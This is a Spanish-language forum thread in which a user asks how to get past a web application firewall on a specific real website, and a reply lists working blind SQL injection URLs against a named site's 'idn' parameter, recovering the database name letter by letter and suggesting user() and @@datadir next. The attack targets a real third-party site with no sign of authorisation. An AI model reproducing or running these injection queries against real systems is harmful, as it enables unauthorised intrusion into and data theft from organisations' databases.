Como determinar que filtro utilizar para bypass WAF

Iniciado por 1v@n, Diciembre 26, 2013, 05:38:45 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Diciembre 26, 2013, 05:38:45 PM Ultima modificación: Septiembre 27, 2014, 09:52:07 AM por Expermicid
saludos comunidad

me encontre con esta web,  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
order by 27--

la cual  eh probado una serie de tecnicas de bypass para evadir el WAF pero hasta el momento no logro evadir si alguien puede aportar ayuda para descubrir  como evadir .

gracias...
Diciembre 26, 2013, 11:22:41 PM #1
Estuve realizando testeos y el waf esta muy bien configurado por lo que se me hizo imposible evadir las restricciones, salvo que la unica informacion que pude obtener fue el nombre de la db con la siguiente consulta, utilizando la tecnica mysql blind, ya que no requeria de ciertas sentencias que se encuentran en la blacklist del firewall.

Código: mysql
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),1,1))=112# ->p
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),2,1))=105# -> i
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),3,1))=101# -> e
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),4,1))=98# -> b
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),5,1))=100# -> d
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),6,1))=111# -> o
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),7,1))=109# -> m
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),8,1))=105# -> i
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),9,1))=95# -> _
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),10,1))=112# -> p
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),11,1))=105# -> i

http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),12,1))=101# -> e
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),13,1))=98#
->b

Database: piebdomi_pieb

asi mismo se podria obtener informacion de funciones como:user(), @@datadir, etc



Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Twitter: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Imprimir
Ir Arriba Páginas1
Acciones del Usuario